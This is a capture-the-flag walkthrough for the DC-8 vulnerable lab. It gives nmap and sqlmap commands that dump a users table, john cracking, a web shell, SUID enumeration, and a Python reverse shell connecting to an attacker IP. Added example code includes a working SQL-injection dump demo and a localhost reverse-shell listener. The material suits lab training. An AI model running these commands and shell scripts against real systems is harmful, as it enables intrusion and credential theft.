Target information
DC-8 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing.
This challenge is a bit of a hybrid between being an actual challenge, and being a "proof of concept" as to whether two-factor authentication installed and configured on Linux can prevent the Linux server from being exploited.
The "proof of concept" portion of this challenge eventuated as a result of a question being asked about two-factor authentication and Linux on Twitter, and also due to a suggestion by @theart42.
The ultimate goal of this challenge is to bypass two-factor authentication, get root and to read the one and only flag.
You probably wouldn't even know that two-factor authentication was installed and configured unless you attempt to login via SSH, but it's definitely there and doing its job.
Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools.
For beginners, Google can be of great assistance, but you can always tweet me at @DCAU7 for assistance to get you going again. But take note: I won't give you the answer, instead, I'll give you an idea about how to move forward.
Information gathering
After deploying the VM, run an nmap ping sweep of the subnet to find the live hosts: one address is Kali's, the other is the target's. Then scan the target for open ports and service versions.
# Ping sweep to find live hosts on the subnet
nmap -sP 10.0.0.0/24
# Full TCP port scan of the target with service/version detection
nmap -sV -p- 10.0.0.24
Browse to port 80.
Check robots.txt.
Get the version information of the web application.
The nid parameter turns out to be SQL-injectable: appending a single quote (?nid=2') breaks the query.
flag1
Use sqlmap to exploit the SQL injection. The first run confirms the injection point; the second dumps the name and pass columns of the users table in the d7db database.
sqlmap -u 'http://10.0.0.24/?nid=2%27'
sqlmap -u 'http://10.0.0.24/?nid=2%27' -D d7db -T users -C name,pass --dump
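To show what the two sqlmap runs above actually exercise, here is an added example (not code from the page or from the DC-8 application) that rebuilds the situation against an in-memory SQLite database. The table and column names match the dump target (users: name, pass); the node table, the rows and the placeholder hashes are constructed for this example, and the vulnerable/safe query pair is an assumption about how such a bug typically looks, not the target's real code.

```python
import sqlite3

# Constructed stand-in for the target's database. Table and column names match
# what the sqlmap dump above targets (users: name, pass); the node table and
# every row (including the placeholder "hashes") are made up for this example.
def make_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE node (nid INTEGER, title TEXT);
        INSERT INTO node VALUES (1, 'Welcome'), (2, 'Who we are');
        CREATE TABLE users (name TEXT, pass TEXT);
        INSERT INTO users VALUES ('admin', 'hash-of-admin-password'),
                                 ('john',  'hash-of-john-password');
    """)
    return db

def vulnerable_lookup(db, nid):
    """The bug: nid is pasted into the SQL text, so the parser sees it as SQL."""
    return [row[0] for row in db.execute("SELECT title FROM node WHERE nid = " + nid)]

def safe_lookup(db, nid):
    """The fix: nid is bound as a parameter and can only ever be a value."""
    return [row[0] for row in db.execute("SELECT title FROM node WHERE nid = ?", (nid,))]

def looks_injectable(db, lookup, nid="2"):
    """The spirit of the ?nid=2' probe: does a stray quote break the query?"""
    try:
        lookup(db, nid + "'")
        return False
    except sqlite3.OperationalError:   # syntax error: the input reached the SQL parser
        return True

def dump_users(db):
    """What '-D d7db -T users -C name,pass --dump' boils down to: a UNION that
    appends the users rows to the legitimate result set."""
    payload = "2 UNION ALL SELECT name || ':' || pass FROM users"
    rows = vulnerable_lookup(db, payload)
    return [r for r in rows if ":" in r]   # keep only the smuggled user rows

if __name__ == "__main__":
    db = make_db()
    print("vulnerable lookup injectable:", looks_injectable(db, vulnerable_lookup))
    print("safe lookup injectable:", looks_injectable(db, safe_lookup))
    print("dumped name:pass rows:", dump_users(db))
```

The same single-quote probe that sqlmap sends returns a syntax error from the concatenated query and nothing at all from the parameterized one, which is exactly the difference a code reviewer should look for at the injection point.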
Save the dumped hashes to hash.txt and crack them with john.
john hash.txt
Log in to the admin back end with the cracked credentials and locate the code-injection point.
The code-injection vulnerability is used to get a web shell.
Connect to the web shell with AntSword (中国蚁剑).
Use find to list SUID binaries (files that run with their owner's privileges).
find / -perm -u=s -type f 2>/dev/null
One of the results is a binary with a public privilege-escalation exploit; that is the path to root.
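The find command above lists every SUID file, and most of them (passwd, sudo, mount, ...) are present on every box. What matters is the handful that are not. The following is an added example, not code from the page, that does the same enumeration in Python and filters the result against a baseline; the baseline set is an assumption for illustration and should be taken from a known-good machine of the same release. It also records the owner, since a SUID binary not owned by root only gets you that owner's privileges.

```python
import os
import stat

# Names of SUID binaries that are normal on a stock Debian-family install.
# This set is an assumption for illustration; build a real baseline from a
# known-good machine of the same release rather than trusting this list.
EXPECTED_SUID = {
    "passwd", "chsh", "chfn", "gpasswd", "newgrp", "su", "sudo",
    "mount", "umount", "ping", "fusermount", "pkexec",
}

def find_suid(root="/"):
    """Python equivalent of `find / -perm -u=s -type f 2>/dev/null`:
    regular files with the setuid bit, returned as (path, owner uid)."""
    hits = []
    for dirpath, _dirnames, filenames in os.walk(root):   # walk skips unreadable dirs silently
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)          # lstat: do not follow symlinks (-type f)
            except OSError:
                continue                     # the 2>/dev/null part
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                hits.append((path, st.st_uid))
    return sorted(hits)

def unusual_suid(hits, baseline=EXPECTED_SUID):
    """Drop the binaries every box has; what remains is where to look for a
    privilege-escalation exploit (or, on a box you defend, what to justify or remove)."""
    return [path for path, _uid in hits if os.path.basename(path) not in baseline]

if __name__ == "__main__":
    hits = find_suid("/")
    for path, uid in hits:
        print(f"{uid:>6} {path}")
    print("not in baseline:", unusual_suid(hits))
```

Run it as the low-privileged web-shell user; directories it cannot read are skipped just as find's errors are discarded by 2>/dev/null.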
Upload a reverse-shell script to /tmp and run it to get a stable interactive shell instead of the web shell. A listener must already be waiting on the attacker machine (for example nc -lvnp 1234 on 10.0.0.221).
#python file (reverse.py): connect back to the attacker and hand it an interactive bash
import os,socket,subprocess
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(('10.0.0.221',1234))   # attacker IP and listening port
os.dup2(s.fileno(),0)   # stdin  <- socket
os.dup2(s.fileno(),1)   # stdout -> socket
os.dup2(s.fileno(),2)   # stderr -> socket
p=subprocess.call(['/bin/bash','-i'])   # bash now reads and writes the socket
#run the file from the web shell
python /tmp/reverse.py
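The script above only shows the target side; the attacker side is a listener. As an added example (not the page's or the author's code), the block below runs both halves on localhost so the mechanism can be watched in one process: the catcher accepts the connection, and the connect-back half wires a shell's stdin, stdout and stderr to the socket. It assumes /bin/sh exists and, to stay self-contained, lets the OS pick the port and lets Popen do the dup2 in the child instead of on the process's own descriptors, which is the one difference from reverse.py.

```python
import socket
import subprocess

def start_listener(host="127.0.0.1", port=0):
    """Attacker side: what `nc -lvnp 1234` does. port=0 lets the OS pick a free
    port so the demo is self-contained; on a real engagement use a fixed port."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((host, port))
    srv.listen(1)
    return srv

def connect_back(host, port, shell="/bin/sh"):
    """Target side, same idea as reverse.py: the shell's stdin, stdout and
    stderr all become the socket. Popen performs the dup2 in the child, so
    this process keeps its own stdio; reverse.py dup2s its own fds instead."""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host, port))
    proc = subprocess.Popen([shell], stdin=s, stdout=s, stderr=s)
    s.close()      # the child holds its own copies; closing ours lets EOF propagate on exit
    return proc

def run_over_reverse_shell(cmd, timeout=15):
    """Drive one command through the reverse shell and return its output,
    the way you would type it into nc and read the reply."""
    srv = start_listener()
    host, port = srv.getsockname()
    proc = connect_back(host, port)          # on a real box this half runs on the target
    conn, _peer = srv.accept()
    conn.settimeout(timeout)
    conn.sendall((cmd + "\nexit\n").encode())
    chunks = []
    while True:                              # read until the shell exits and closes the socket
        data = conn.recv(4096)
        if not data:
            break
        chunks.append(data)
    conn.close()
    srv.close()
    proc.wait(timeout)
    return b"".join(chunks).decode().strip()

if __name__ == "__main__":
    print(run_over_reverse_shell("id"))
```

Because stderr is also bound to the socket, error messages from the remote shell come back over the same connection, which is why a failed command in a reverse shell is visible to the attacker but never in the target's logs.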
In the reverse shell, write the privilege-escalation exploit script with vi, make it executable and run it, first in its setuid mode and then in its netcat mode:
./exp.sh -m setuid
./exp.sh -m netcat
Last updated 2021-03-08 16:33